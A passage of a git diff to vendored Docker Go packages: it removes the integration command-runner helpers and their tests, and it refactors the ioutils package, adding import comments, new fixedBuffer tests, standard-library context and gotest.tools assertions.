r.ExitCode, - timeout, - r.Error, - r.Stdout(), - r.Stderr()) -} - -// Expected is the expected output from a Command. This struct is compared to a -// Result struct by Result.Assert(). -type Expected struct { - ExitCode int - Timeout bool - Error string - Out string - Err string -} - -// Success is the default expected result -var Success = Expected{} - -// Stdout returns the stdout of the process as a string -func (r *Result) Stdout() string { - return r.outBuffer.String() -} - -// Stderr returns the stderr of the process as a string -func (r *Result) Stderr() string { - return r.errBuffer.String() -} - -// Combined returns the stdout and stderr combined into a single string -func (r *Result) Combined() string { - return r.outBuffer.String() + r.errBuffer.String() -} - -// SetExitError sets Error and ExitCode based on Error -func (r *Result) SetExitError(err error) { - if err == nil { - return - } - r.Error = err - r.ExitCode = system.ProcessExitCode(err) -} - -type matches struct{} - -// Info returns the CheckerInfo -func (m *matches) Info() *check.CheckerInfo { - return &check.CheckerInfo{ - Name: "CommandMatches", - Params: []string{"result", "expected"}, - } -} - -// Check compares a result against the expected -func (m *matches) Check(params []interface{}, names []string) (bool, string) { - result, ok := params[0].(*Result) - if !ok { - return false, fmt.Sprintf("result must be a *Result, not %T", params[0]) - } - expected, ok := params[1].(Expected) - if !ok { - return false, fmt.Sprintf("expected must be an Expected, not %T", params[1]) - } - - err := result.Compare(expected) - if err == nil { - return true, "" - } - return false, err.Error() -} - -// Matches is a gocheck.Checker for comparing a Result against an Expected -var Matches = &matches{} - -// Cmd contains the arguments and options for a process to run as part of a test -// suite. -type Cmd struct { - Command []string - Timeout time.Duration - Stdin io.Reader - Stdout io.Writer - Dir string - Env []string -} - -// RunCmd runs a command and returns a Result -func RunCmd(cmd Cmd) *Result { - result := StartCmd(cmd) - if result.Error != nil { - return result - } - return WaitOnCmd(cmd.Timeout, result) -} - -// RunCommand parses a command line and runs it, returning a result -func RunCommand(command string, args ...string) *Result { - return RunCmd(Cmd{Command: append([]string{command}, args...)}) -} - -// StartCmd starts a command, but doesn't wait for it to finish -func StartCmd(cmd Cmd) *Result { - result := buildCmd(cmd) - if result.Error != nil { - return result - } - result.SetExitError(result.Cmd.Start()) - return result -} - -func buildCmd(cmd Cmd) *Result { - var execCmd *exec.Cmd - switch len(cmd.Command) { - case 1: - execCmd = exec.Command(cmd.Command[0]) - default: - execCmd = exec.Command(cmd.Command[0], cmd.Command[1:]...) - } - outBuffer := new(lockedBuffer) - errBuffer := new(lockedBuffer) - - execCmd.Stdin = cmd.Stdin - execCmd.Dir = cmd.Dir - execCmd.Env = cmd.Env - if cmd.Stdout != nil { - execCmd.Stdout = io.MultiWriter(outBuffer, cmd.Stdout) - } else { - execCmd.Stdout = outBuffer - } - execCmd.Stderr = errBuffer - return &Result{ - Cmd: execCmd, - outBuffer: outBuffer, - errBuffer: errBuffer, - } -} - -// WaitOnCmd waits for a command to complete. If timeout is non-nil then -// only wait until the timeout. -func WaitOnCmd(timeout time.Duration, result *Result) *Result { - if timeout == time.Duration(0) { - result.SetExitError(result.Cmd.Wait()) - return result - } - - done := make(chan error, 1) - // Wait for command to exit in a goroutine - go func() { - done <- result.Cmd.Wait() - }() - - select { - case <-time.After(timeout): - killErr := result.Cmd.Process.Kill() - if killErr != nil { - fmt.Printf("failed to kill (pid=%d): %v\n", result.Cmd.Process.Pid, killErr) - } - result.Timeout = true - case err := <-done: - result.SetExitError(err) - } - return result -} diff --git a/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go b/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go deleted file mode 100644 index df23442079..0000000000 --- a/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go +++ /dev/null @@ -1,118 +0,0 @@ -package cmd - -import ( - "runtime" - "strings" - "testing" - "time" - - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestRunCommand(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - - var cmd string - if runtime.GOOS == "solaris" { - cmd = "gls" - } else { - cmd = "ls" - } - result := RunCommand(cmd) - result.Assert(t, Expected{}) - - result = RunCommand("doesnotexists") - expectedError := `exec: "doesnotexists": executable file not found` - result.Assert(t, Expected{ExitCode: 127, Error: expectedError}) - - result = RunCommand(cmd, "-z") - result.Assert(t, Expected{ - ExitCode: 2, - Error: "exit status 2", - Err: "invalid option", - }) - assert.Contains(t, result.Combined(), "invalid option") -} - -func TestRunCommandWithCombined(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - - result := RunCommand("ls", "-a") - result.Assert(t, Expected{}) - - assert.Contains(t, result.Combined(), "..") - assert.Contains(t, result.Stdout(), "..") -} - -func TestRunCommandWithTimeoutFinished(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - - result := RunCmd(Cmd{ - Command: []string{"ls", "-a"}, - Timeout: 50 * time.Millisecond, - }) - result.Assert(t, Expected{Out: ".."}) -} - -func TestRunCommandWithTimeoutKilled(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - - command := []string{"sh", "-c", "while true ; do echo 1 ; sleep .5 ; done"} - result := RunCmd(Cmd{Command: command, Timeout: 1250 * time.Millisecond}) - result.Assert(t, Expected{Timeout: true}) - - ones := strings.Split(result.Stdout(), "\n") - assert.Equal(t, len(ones), 4) -} - -func TestRunCommandWithErrors(t *testing.T) { - result := RunCommand("/foobar") - result.Assert(t, Expected{Error: "foobar", ExitCode: 127}) -} - -func TestRunCommandWithStdoutStderr(t *testing.T) { - result := RunCommand("echo", "hello", "world") - result.Assert(t, Expected{Out: "hello world\n", Err: None}) -} - -func TestRunCommandWithStdoutStderrError(t *testing.T) { - result := RunCommand("doesnotexists") - - expected := `exec: "doesnotexists": executable file not found` - result.Assert(t, Expected{Out: None, Err: None, ExitCode: 127, Error: expected}) - - switch runtime.GOOS { - case "windows": - expected = "ls: unknown option" - case "solaris": - expected = "gls: invalid option" - default: - expected = "ls: invalid option" - } - - var cmd string - if runtime.GOOS == "solaris" { - cmd = "gls" - } else { - cmd = "ls" - } - result = RunCommand(cmd, "-z") - result.Assert(t, Expected{ - Out: None, - Err: expected, - ExitCode: 2, - Error: "exit status 2", - }) -} diff --git a/vendor/github.com/docker/docker/pkg/integration/utils.go b/vendor/github.com/docker/docker/pkg/integration/utils.go deleted file mode 100644 index f2089c43c4..0000000000 --- a/vendor/github.com/docker/docker/pkg/integration/utils.go +++ /dev/null @@ -1,227 +0,0 @@ -package integration - -import ( - "archive/tar" - "errors" - "fmt" - "io" - "os" - "os/exec" - "path/filepath" - "reflect" - "strings" - "syscall" - "time" - - icmd "github.com/docker/docker/pkg/integration/cmd" - "github.com/docker/docker/pkg/stringutils" - "github.com/docker/docker/pkg/system" -) - -// IsKilled process the specified error and returns whether the process was killed or not. -func IsKilled(err error) bool { - if exitErr, ok := err.(*exec.ExitError); ok { - status, ok := exitErr.Sys().(syscall.WaitStatus) - if !ok { - return false - } - // status.ExitStatus() is required on Windows because it does not - // implement Signal() nor Signaled(). Just check it had a bad exit - // status could mean it was killed (and in tests we do kill) - return (status.Signaled() && status.Signal() == os.Kill) || status.ExitStatus() != 0 - } - return false -} - -func runCommandWithOutput(cmd *exec.Cmd) (output string, exitCode int, err error) { - exitCode = 0 - out, err := cmd.CombinedOutput() - exitCode = system.ProcessExitCode(err) - output = string(out) - return -} - -// RunCommandPipelineWithOutput runs the array of commands with the output -// of each pipelined with the following (like cmd1 | cmd2 | cmd3 would do). -// It returns the final output, the exitCode different from 0 and the error -// if something bad happened. -func RunCommandPipelineWithOutput(cmds ...*exec.Cmd) (output string, exitCode int, err error) { - if len(cmds) < 2 { - return "", 0, errors.New("pipeline does not have multiple cmds") - } - - // connect stdin of each cmd to stdout pipe of previous cmd - for i, cmd := range cmds { - if i > 0 { - prevCmd := cmds[i-1] - cmd.Stdin, err = prevCmd.StdoutPipe() - - if err != nil { - return "", 0, fmt.Errorf("cannot set stdout pipe for %s: %v", cmd.Path, err) - } - } - } - - // start all cmds except the last - for _, cmd := range cmds[:len(cmds)-1] { - if err = cmd.Start(); err != nil { - return "", 0, fmt.Errorf("starting %s failed with error: %v", cmd.Path, err) - } - } - - defer func() { - var pipeErrMsgs []string - // wait all cmds except the last to release their resources - for _, cmd := range cmds[:len(cmds)-1] { - if pipeErr := cmd.Wait(); pipeErr != nil { - pipeErrMsgs = append(pipeErrMsgs, fmt.Sprintf("command %s failed with error: %v", cmd.Path, pipeErr)) - } - } - if len(pipeErrMsgs) > 0 && err == nil { - err = fmt.Errorf("pipelineError from Wait: %v", strings.Join(pipeErrMsgs, ", ")) - } - }() - - // wait on last cmd - return runCommandWithOutput(cmds[len(cmds)-1]) -} - -// ConvertSliceOfStringsToMap converts a slices of string in a map -// with the strings as key and an empty string as values. -func ConvertSliceOfStringsToMap(input []string) map[string]struct{} { - output := make(map[string]struct{}) - for _, v := range input { - output[v] = struct{}{} - } - return output -} - -// CompareDirectoryEntries compares two sets of FileInfo (usually taken from a directory) -// and returns an error if different. -func CompareDirectoryEntries(e1 []os.FileInfo, e2 []os.FileInfo) error { - var ( - e1Entries = make(map[string]struct{}) - e2Entries = make(map[string]struct{}) - ) - for _, e := range e1 { - e1Entries[e.Name()] = struct{}{} - } - for _, e := range e2 { - e2Entries[e.Name()] = struct{}{} - } - if !reflect.DeepEqual(e1Entries, e2Entries) { - return fmt.Errorf("entries differ") - } - return nil -} - -// ListTar lists the entries of a tar. -func ListTar(f io.Reader) ([]string, error) { - tr := tar.NewReader(f) - var entries []string - - for { - th, err := tr.Next() - if err == io.EOF { - // end of tar archive - return entries, nil - } - if err != nil { - return entries, err - } - entries = append(entries, th.Name) - } -} - -// RandomTmpDirPath provides a temporary path with rand string appended. -// does not create or checks if it exists. -func RandomTmpDirPath(s string, platform string) string { - tmp := "/tmp" - if platform == "windows" { - tmp = os.Getenv("TEMP") - } - path := filepath.Join(tmp, fmt.Sprintf("%s.%s", s, stringutils.GenerateRandomAlphaOnlyString(10))) - if platform == "windows" { - return filepath.FromSlash(path) // Using \ - } - return filepath.ToSlash(path) // Using / -} - -// ConsumeWithSpeed reads chunkSize bytes from reader before sleeping -// for interval duration. Returns total read bytes. Send true to the -// stop channel to return before reading to EOF on the reader. -func ConsumeWithSpeed(reader io.Reader, chunkSize int, interval time.Duration, stop chan bool) (n int, err error) { - buffer := make([]byte, chunkSize) - for { - var readBytes int - readBytes, err = reader.Read(buffer) - n += readBytes - if err != nil { - if err == io.EOF { - err = nil - } - return - } - select { - case <-stop: - return - case <-time.After(interval): - } - } -} - -// ParseCgroupPaths parses 'procCgroupData', which is output of '/proc//cgroup', and returns -// a map which cgroup name as key and path as value. -func ParseCgroupPaths(procCgroupData string) map[string]string { - cgroupPaths := map[string]string{} - for _, line := range strings.Split(procCgroupData, "\n") { - parts := strings.Split(line, ":") - if len(parts) != 3 { - continue - } - cgroupPaths[parts[1]] = parts[2] - } - return cgroupPaths -} - -// ChannelBuffer holds a chan of byte array that can be populate in a goroutine. -type ChannelBuffer struct { - C chan []byte -} - -// Write implements Writer. -func (c *ChannelBuffer) Write(b []byte) (int, error) { - c.C <- b - return len(b), nil -} - -// Close closes the go channel. -func (c *ChannelBuffer) Close() error { - close(c.C) - return nil -} - -// ReadTimeout reads the content of the channel in the specified byte array with -// the specified duration as timeout. -func (c *ChannelBuffer) ReadTimeout(p []byte, n time.Duration) (int, error) { - select { - case b := <-c.C: - return copy(p[0:], b), nil - case <-time.After(n): - return -1, fmt.Errorf("timeout reading from channel") - } -} - -// RunAtDifferentDate runs the specified function with the given time. -// It changes the date of the system, which can led to weird behaviors. -func RunAtDifferentDate(date time.Time, block func()) { - // Layout for date. MMDDhhmmYYYY - const timeLayout = "010203042006" - // Ensure we bring time back to now - now := time.Now().Format(timeLayout) - defer icmd.RunCommand("date", now) - - icmd.RunCommand("date", date.Format(timeLayout)) - block() - return -} diff --git a/vendor/github.com/docker/docker/pkg/integration/utils_test.go b/vendor/github.com/docker/docker/pkg/integration/utils_test.go deleted file mode 100644 index 0b2ef4aff5..0000000000 --- a/vendor/github.com/docker/docker/pkg/integration/utils_test.go +++ /dev/null @@ -1,363 +0,0 @@ -package integration - -import ( - "io" - "io/ioutil" - "os" - "os/exec" - "path/filepath" - "runtime" - "strings" - "testing" - "time" -) - -func TestIsKilledFalseWithNonKilledProcess(t *testing.T) { - var lsCmd *exec.Cmd - if runtime.GOOS != "windows" { - lsCmd = exec.Command("ls") - } else { - lsCmd = exec.Command("cmd", "/c", "dir") - } - - err := lsCmd.Run() - if IsKilled(err) { - t.Fatalf("Expected the ls command to not be killed, was.") - } -} - -func TestIsKilledTrueWithKilledProcess(t *testing.T) { - var longCmd *exec.Cmd - if runtime.GOOS != "windows" { - longCmd = exec.Command("top") - } else { - longCmd = exec.Command("powershell", "while ($true) { sleep 1 }") - } - - // Start a command - err := longCmd.Start() - if err != nil { - t.Fatal(err) - } - // Capture the error when *dying* - done := make(chan error, 1) - go func() { - done <- longCmd.Wait() - }() - // Then kill it - longCmd.Process.Kill() - // Get the error - err = <-done - if !IsKilled(err) { - t.Fatalf("Expected the command to be killed, was not.") - } -} - -func TestRunCommandPipelineWithOutputWithNotEnoughCmds(t *testing.T) { - _, _, err := RunCommandPipelineWithOutput(exec.Command("ls")) - expectedError := "pipeline does not have multiple cmds" - if err == nil || err.Error() != expectedError { - t.Fatalf("Expected an error with %s, got err:%s", expectedError, err) - } -} - -func TestRunCommandPipelineWithOutputErrors(t *testing.T) { - p := "$PATH" - if runtime.GOOS == "windows" { - p = "%PATH%" - } - cmd1 := exec.Command("ls") - cmd1.Stdout = os.Stdout - cmd2 := exec.Command("anything really") - _, _, err := RunCommandPipelineWithOutput(cmd1, cmd2) - if err == nil || err.Error() != "cannot set stdout pipe for anything really: exec: Stdout already set" { - t.Fatalf("Expected an error, got %v", err) - } - - cmdWithError := exec.Command("doesnotexists") - cmdCat := exec.Command("cat") - _, _, err = RunCommandPipelineWithOutput(cmdWithError, cmdCat) - if err == nil || err.Error() != `starting doesnotexists failed with error: exec: "doesnotexists": executable file not found in `+p { - t.Fatalf("Expected an error, got %v", err) - } -} - -func TestRunCommandPipelineWithOutput(t *testing.T) { - //TODO: Should run on Solaris - if runtime.GOOS == "solaris" { - t.Skip() - } - cmds := []*exec.Cmd{ - // Print 2 characters - exec.Command("echo", "-n", "11"), - // Count the number or char from stdin (previous command) - exec.Command("wc", "-m"), - } - out, exitCode, err := RunCommandPipelineWithOutput(cmds...) - expectedOutput := "2\n" - if out != expectedOutput || exitCode != 0 || err != nil { - t.Fatalf("Expected %s for commands %v, got out:%s, exitCode:%d, err:%v", expectedOutput, cmds, out, exitCode, err) - } -} - -func TestConvertSliceOfStringsToMap(t *testing.T) { - input := []string{"a", "b"} - actual := ConvertSliceOfStringsToMap(input) - for _, key := range input { - if _, ok := actual[key]; !ok { - t.Fatalf("Expected output to contains key %s, did not: %v", key, actual) - } - } -} - -func TestCompareDirectoryEntries(t *testing.T) { - tmpFolder, err := ioutil.TempDir("", "integration-cli-utils-compare-directories") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpFolder) - - file1 := filepath.Join(tmpFolder, "file1") - file2 := filepath.Join(tmpFolder, "file2") - os.Create(file1) - os.Create(file2) - - fi1, err := os.Stat(file1) - if err != nil { - t.Fatal(err) - } - fi1bis, err := os.Stat(file1) - if err != nil { - t.Fatal(err) - } - fi2, err := os.Stat(file2) - if err != nil { - t.Fatal(err) - } - - cases := []struct { - e1 []os.FileInfo - e2 []os.FileInfo - shouldError bool - }{ - // Empty directories - { - []os.FileInfo{}, - []os.FileInfo{}, - false, - }, - // Same FileInfos - { - []os.FileInfo{fi1}, - []os.FileInfo{fi1}, - false, - }, - // Different FileInfos but same names - { - []os.FileInfo{fi1}, - []os.FileInfo{fi1bis}, - false, - }, - // Different FileInfos, different names - { - []os.FileInfo{fi1}, - []os.FileInfo{fi2}, - true, - }, - } - for _, elt := range cases { - err := CompareDirectoryEntries(elt.e1, elt.e2) - if elt.shouldError && err == nil { - t.Fatalf("Should have return an error, did not with %v and %v", elt.e1, elt.e2) - } - if !elt.shouldError && err != nil { - t.Fatalf("Should have not returned an error, but did : %v with %v and %v", err, elt.e1, elt.e2) - } - } -} - -// FIXME make an "unhappy path" test for ListTar without "panicking" :-) -func TestListTar(t *testing.T) { - // TODO Windows: Figure out why this fails. Should be portable. - if runtime.GOOS == "windows" { - t.Skip("Failing on Windows - needs further investigation") - } - tmpFolder, err := ioutil.TempDir("", "integration-cli-utils-list-tar") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpFolder) - - // Let's create a Tar file - srcFile := filepath.Join(tmpFolder, "src") - tarFile := filepath.Join(tmpFolder, "src.tar") - os.Create(srcFile) - cmd := exec.Command("sh", "-c", "tar cf "+tarFile+" "+srcFile) - _, err = cmd.CombinedOutput() - if err != nil { - t.Fatal(err) - } - - reader, err := os.Open(tarFile) - if err != nil { - t.Fatal(err) - } - defer reader.Close() - - entries, err := ListTar(reader) - if err != nil { - t.Fatal(err) - } - if len(entries) != 1 && entries[0] != "src" { - t.Fatalf("Expected a tar file with 1 entry (%s), got %v", srcFile, entries) - } -} - -func TestRandomTmpDirPath(t *testing.T) { - path := RandomTmpDirPath("something", runtime.GOOS) - - prefix := "/tmp/something" - if runtime.GOOS == "windows" { - prefix = os.Getenv("TEMP") + `\something` - } - expectedSize := len(prefix) + 11 - - if !strings.HasPrefix(path, prefix) { - t.Fatalf("Expected generated path to have '%s' as prefix, got %s'", prefix, path) - } - if len(path) != expectedSize { - t.Fatalf("Expected generated path to be %d, got %d", expectedSize, len(path)) - } -} - -func TestConsumeWithSpeed(t *testing.T) { - reader := strings.NewReader("1234567890") - chunksize := 2 - - bytes1, err := ConsumeWithSpeed(reader, chunksize, 1*time.Second, nil) - if err != nil { - t.Fatal(err) - } - - if bytes1 != 10 { - t.Fatalf("Expected to have read 10 bytes, got %d", bytes1) - } - -} - -func TestConsumeWithSpeedWithStop(t *testing.T) { - reader := strings.NewReader("1234567890") - chunksize := 2 - - stopIt := make(chan bool) - - go func() { - time.Sleep(1 * time.Millisecond) - stopIt <- true - }() - - bytes1, err := ConsumeWithSpeed(reader, chunksize, 20*time.Millisecond, stopIt) - if err != nil { - t.Fatal(err) - } - - if bytes1 != 2 { - t.Fatalf("Expected to have read 2 bytes, got %d", bytes1) - } - -} - -func TestParseCgroupPathsEmpty(t *testing.T) { - cgroupMap := ParseCgroupPaths("") - if len(cgroupMap) != 0 { - t.Fatalf("Expected an empty map, got %v", cgroupMap) - } - cgroupMap = ParseCgroupPaths("\n") - if len(cgroupMap) != 0 { - t.Fatalf("Expected an empty map, got %v", cgroupMap) - } - cgroupMap = ParseCgroupPaths("something:else\nagain:here") - if len(cgroupMap) != 0 { - t.Fatalf("Expected an empty map, got %v", cgroupMap) - } -} - -func TestParseCgroupPaths(t *testing.T) { - cgroupMap := ParseCgroupPaths("2:memory:/a\n1:cpuset:/b") - if len(cgroupMap) != 2 { - t.Fatalf("Expected a map with 2 entries, got %v", cgroupMap) - } - if value, ok := cgroupMap["memory"]; !ok || value != "/a" { - t.Fatalf("Expected cgroupMap to contains an entry for 'memory' with value '/a', got %v", cgroupMap) - } - if value, ok := cgroupMap["cpuset"]; !ok || value != "/b" { - t.Fatalf("Expected cgroupMap to contains an entry for 'cpuset' with value '/b', got %v", cgroupMap) - } -} - -func TestChannelBufferTimeout(t *testing.T) { - expected := "11" - - buf := &ChannelBuffer{make(chan []byte, 1)} - defer buf.Close() - - done := make(chan struct{}, 1) - go func() { - time.Sleep(100 * time.Millisecond) - io.Copy(buf, strings.NewReader(expected)) - done <- struct{}{} - }() - - // Wait long enough - b := make([]byte, 2) - _, err := buf.ReadTimeout(b, 50*time.Millisecond) - if err == nil && err.Error() != "timeout reading from channel" { - t.Fatalf("Expected an error, got %s", err) - } - <-done -} - -func TestChannelBuffer(t *testing.T) { - expected := "11" - - buf := &ChannelBuffer{make(chan []byte, 1)} - defer buf.Close() - - go func() { - time.Sleep(100 * time.Millisecond) - io.Copy(buf, strings.NewReader(expected)) - }() - - // Wait long enough - b := make([]byte, 2) - _, err := buf.ReadTimeout(b, 200*time.Millisecond) - if err != nil { - t.Fatal(err) - } - - if string(b) != expected { - t.Fatalf("Expected '%s', got '%s'", expected, string(b)) - } -} - -// FIXME doesn't work -// func TestRunAtDifferentDate(t *testing.T) { -// var date string - -// // Layout for date. MMDDhhmmYYYY -// const timeLayout = "20060102" -// expectedDate := "20100201" -// theDate, err := time.Parse(timeLayout, expectedDate) -// if err != nil { -// t.Fatal(err) -// } - -// RunAtDifferentDate(theDate, func() { -// cmd := exec.Command("date", "+%Y%M%d") -// out, err := cmd.Output() -// if err != nil { -// t.Fatal(err) -// } -// date = string(out) -// }) -// } diff --git a/vendor/github.com/docker/docker/pkg/ioutils/buffer.go b/vendor/github.com/docker/docker/pkg/ioutils/buffer.go index 3d737b3e19..466f79294b 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/buffer.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/buffer.go @@ -1,4 +1,4 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "errors" diff --git a/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go b/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go index 41098fa6e7..b8887bfde0 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go @@ -1,10 +1,85 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "bytes" "testing" ) +func TestFixedBufferCap(t *testing.T) { + buf := &fixedBuffer{buf: make([]byte, 0, 5)} + + n := buf.Cap() + if n != 5 { + t.Fatalf("expected buffer capacity to be 5 bytes, got %d", n) + } +} + +func TestFixedBufferLen(t *testing.T) { + buf := &fixedBuffer{buf: make([]byte, 0, 10)} + + buf.Write([]byte("hello")) + l := buf.Len() + if l != 5 { + t.Fatalf("expected buffer length to be 5 bytes, got %d", l) + } + + buf.Write([]byte("world")) + l = buf.Len() + if l != 10 { + t.Fatalf("expected buffer length to be 10 bytes, got %d", l) + } + + // read 5 bytes + b := make([]byte, 5) + buf.Read(b) + + l = buf.Len() + if l != 5 { + t.Fatalf("expected buffer length to be 5 bytes, got %d", l) + } + + n, err := buf.Write([]byte("i-wont-fit")) + if n != 0 { + t.Fatalf("expected no bytes to be written to buffer, got %d", n) + } + if err != errBufferFull { + t.Fatalf("expected errBufferFull, got %v", err) + } + + l = buf.Len() + if l != 5 { + t.Fatalf("expected buffer length to still be 5 bytes, got %d", l) + } + + buf.Reset() + l = buf.Len() + if l != 0 { + t.Fatalf("expected buffer length to still be 0 bytes, got %d", l) + } +} + +func TestFixedBufferString(t *testing.T) { + buf := &fixedBuffer{buf: make([]byte, 0, 10)} + + buf.Write([]byte("hello")) + buf.Write([]byte("world")) + + out := buf.String() + if out != "helloworld" { + t.Fatalf("expected output to be \"helloworld\", got %q", out) + } + + // read 5 bytes + b := make([]byte, 5) + buf.Read(b) + + // test that fixedBuffer.String() only returns the part that hasn't been read + out = buf.String() + if out != "world" { + t.Fatalf("expected output to be \"world\", got %q", out) + } +} + func TestFixedBufferWrite(t *testing.T) { buf := &fixedBuffer{buf: make([]byte, 0, 64)} n, err := buf.Write([]byte("hello")) @@ -21,6 +96,9 @@ func TestFixedBufferWrite(t *testing.T) { } n, err = buf.Write(bytes.Repeat([]byte{1}, 64)) + if n != 59 { + t.Fatalf("expected 59 bytes written before buffer is full, got %d", n) + } if err != errBufferFull { t.Fatalf("expected errBufferFull, got %v - %v", err, buf.buf[:64]) } diff --git a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go index 72a04f3491..d4bbf3c9dc 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go @@ -1,4 +1,4 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "errors" diff --git a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go index 300fb5f6d5..9101f20a21 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go @@ -1,4 +1,4 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "crypto/sha1" diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fmt.go b/vendor/github.com/docker/docker/pkg/ioutils/fmt.go deleted file mode 100644 index 0b04b0ba3e..0000000000 --- a/vendor/github.com/docker/docker/pkg/ioutils/fmt.go +++ /dev/null @@ -1,22 +0,0 @@ -package ioutils - -import ( - "fmt" - "io" -) - -// FprintfIfNotEmpty prints the string value if it's not empty -func FprintfIfNotEmpty(w io.Writer, format, value string) (int, error) { - if value != "" { - return fmt.Fprintf(w, format, value) - } - return 0, nil -} - -// FprintfIfTrue prints the boolean value if it's true -func FprintfIfTrue(w io.Writer, format string, ok bool) (int, error) { - if ok { - return fmt.Fprintf(w, format, ok) - } - return 0, nil -} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go b/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go deleted file mode 100644 index 8968863296..0000000000 --- a/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go +++ /dev/null @@ -1,17 +0,0 @@ -package ioutils - -import "testing" - -func TestFprintfIfNotEmpty(t *testing.T) { - wc := NewWriteCounter(&NopWriter{}) - n, _ := FprintfIfNotEmpty(wc, "foo%s", "") - - if wc.Count != 0 || n != 0 { - t.Errorf("Wrong count: %v vs. %v vs. 0", wc.Count, n) - } - - n, _ = FprintfIfNotEmpty(wc, "foo%s", "bar") - if wc.Count != 6 || n != 6 { - t.Errorf("Wrong count: %v vs. %v vs. 6", wc.Count, n) - } -} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go b/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go index a56c462651..534d66ac26 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go @@ -1,4 +1,4 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go b/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go index c4d1419306..b283045de5 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go @@ -1,4 +1,4 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "bytes" @@ -37,7 +37,7 @@ func TestAtomicWriteToFile(t *testing.T) { t.Fatalf("Error reading from file: %v", err) } - if bytes.Compare(actual, expected) != 0 { + if !bytes.Equal(actual, expected) { t.Fatalf("Data mismatch, expected %q, got %q", expected, actual) } @@ -85,7 +85,7 @@ func TestAtomicWriteSetCommit(t *testing.T) { t.Fatalf("Error reading from file: %v", err) } - if bytes.Compare(actual, expected) != 0 { + if !bytes.Equal(actual, expected) { t.Fatalf("Data mismatch, expected %q, got %q", expected, actual) } diff --git a/vendor/github.com/docker/docker/pkg/ioutils/readers.go b/vendor/github.com/docker/docker/pkg/ioutils/readers.go index 63f3c07f46..1f657bd3dc 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/readers.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/readers.go @@ -1,25 +1,28 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( + "context" "crypto/sha256" "encoding/hex" "io" - - "golang.org/x/net/context" ) -type readCloserWrapper struct { +// ReadCloserWrapper wraps an io.Reader, and implements an io.ReadCloser +// It calls the given callback function when closed. It should be constructed +// with NewReadCloserWrapper +type ReadCloserWrapper struct { io.Reader closer func() error } -func (r *readCloserWrapper) Close() error { +// Close calls back the passed closer function +func (r *ReadCloserWrapper) Close() error { return r.closer() } // NewReadCloserWrapper returns a new io.ReadCloser. func NewReadCloserWrapper(r io.Reader, closer func() error) io.ReadCloser { - return &readCloserWrapper{ + return &ReadCloserWrapper{ Reader: r, closer: closer, } diff --git a/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go b/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go index 9abc1054df..e645c78d83 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go @@ -1,20 +1,22 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( + "context" "fmt" "io/ioutil" "strings" "testing" "time" - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) // Implement io.Reader type errorReader struct{} func (r *errorReader) Read(p []byte) (int, error) { - return 0, fmt.Errorf("Error reader always fail.") + return 0, fmt.Errorf("error reader always fail") } func TestReadCloserWrapperClose(t *testing.T) { @@ -35,9 +37,7 @@ func TestReaderErrWrapperReadOnError(t *testing.T) { called = true }) _, err := wrapper.Read([]byte{}) - if err == nil || !strings.Contains(err.Error(), "Error reader always fail.") { - t.Fatalf("readErrWrapper should returned an error") - } + assert.Check(t, is.Error(err, "error reader always fail")) if !called { t.Fatalf("readErrWrapper should have call the anonymous function on failure") } @@ -80,7 +80,8 @@ func (p *perpetualReader) Read(buf []byte) (n int, err error) { } func TestCancelReadCloser(t *testing.T) { - ctx, _ := 